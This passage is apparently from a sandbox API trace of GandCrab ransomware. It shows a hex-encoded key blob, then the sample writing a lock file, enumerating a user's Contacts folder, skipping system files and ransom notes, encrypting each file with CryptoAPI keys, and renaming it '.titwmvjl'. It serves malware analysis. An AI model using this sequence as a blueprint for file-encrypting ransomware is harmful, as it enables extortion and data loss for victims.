5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0086.347] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0086.348] CloseHandle (hObject=0x230) returned 1 [0086.348] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.348] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.348] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x29a)) [0086.348] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.349] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.349] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.349] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock") returned 55 [0086.349] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0086.349] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.350] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\") returned 31 [0086.350] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\*" [0086.350] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503638 [0086.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.350] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0086.350] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.350] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0086.350] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2=".") returned 1 [0086.350] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2="..") returned 1 [0086.351] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="Aclviho ASldjfl.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact" [0086.351] lstrlenW (lpString=".titwmvjl") returned 9 [0086.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0086.351] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.351] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact.titwmvjl") returned 63 [0086.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0086.351] lstrlenW (lpString=".contact") returned 8 [0086.351] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.351] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".contact ") returned 9 [0086.351] lstrcmpiW (lpString1=".contact", lpString2=".titwmvjl") returned -1 [0086.351] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0086.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="desktop.ini") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="autorun.inf") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="iconcache.db") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="bootsect.bak") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="boot.ini") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat.log") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="thumbs.db") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0086.351] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="KRAB-DECRYPT.html") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="CRAB-DECRYPT.html") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntldr") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="NTDETECT.COM") returned -1 [0086.352] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Bootfont.bin") returned -1 [0086.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0086.352] lstrlenW (lpString=".contact") returned 8 [0086.352] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.352] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".contact ") returned 9 [0086.352] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.352] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0086.353] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.353] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0086.768] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.769] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.769] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0086.770] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.770] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.770] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.770] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0086.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.770] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.771] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.771] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0086.772] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.772] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.772] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.772] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0086.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.773] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.773] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.773] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0086.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.774] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503778) returned 1 [0086.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.775] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0086.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.775] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0086.775] GetLastError () returned 0x0 [0086.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.775] CryptDestroyKey (hKey=0x503778) returned 1 [0086.775] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.775] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.776] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0086.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.777] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503478) returned 1 [0086.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.777] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0086.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.777] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0086.777] GetLastError () returned 0x0 [0086.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.778] CryptDestroyKey (hKey=0x503478) returned 1 [0086.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.778] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.778] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.778] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.778] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x49a, lpOverlapped=0x0) returned 1 [0086.791] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.791] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x49a, lpOverlapped=0x0) returned 1 [0086.877] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.877] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0086.879] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.882] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.882] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.883] CloseHandle (hObject=0x2ac) returned 1 [0086.883] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\aclviho asldjfl.contact.titwmvjl"), dwFlags=0x1) returned 1 [0086.884] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.884] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0086.884] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2=".") returned 1 [0086.884] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2="..") returned 1 [0086.884] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="asdlfk poopvy.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact" [0086.884] lstrlenW (lpString=".titwmvjl") returned 9 [0086.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0086.884] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.885] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact.titwmvjl") returned 61 [0086.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0086.885] lstrlenW (lpString=".contact") returned 8 [0086.885] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.885] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".contact ") returned 9 [0086.885] lstrcmpiW (lpString1=".contact", lpString2=".titwmvjl") returned -1 [0086.885] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0086.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="desktop.ini") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="autorun.inf") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="iconcache.db") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="bootsect.bak") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="boot.ini") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat.log") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="thumbs.db") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="KRAB-DECRYPT.html") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="CRAB-DECRYPT.html") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntldr") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="NTDETECT.COM") returned -1 [0086.885] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Bootfont.bin") returned -1 [0086.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0086.885] lstrlenW (lpString=".contact") returned 8 [0086.886] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.886] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".contact ") returned 9 [0086.886] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.886] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.886] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0086.886] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.886] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0086.974] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.974] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0086.975] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.975] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.976] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.976] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0086.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.976] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.976] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.976] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 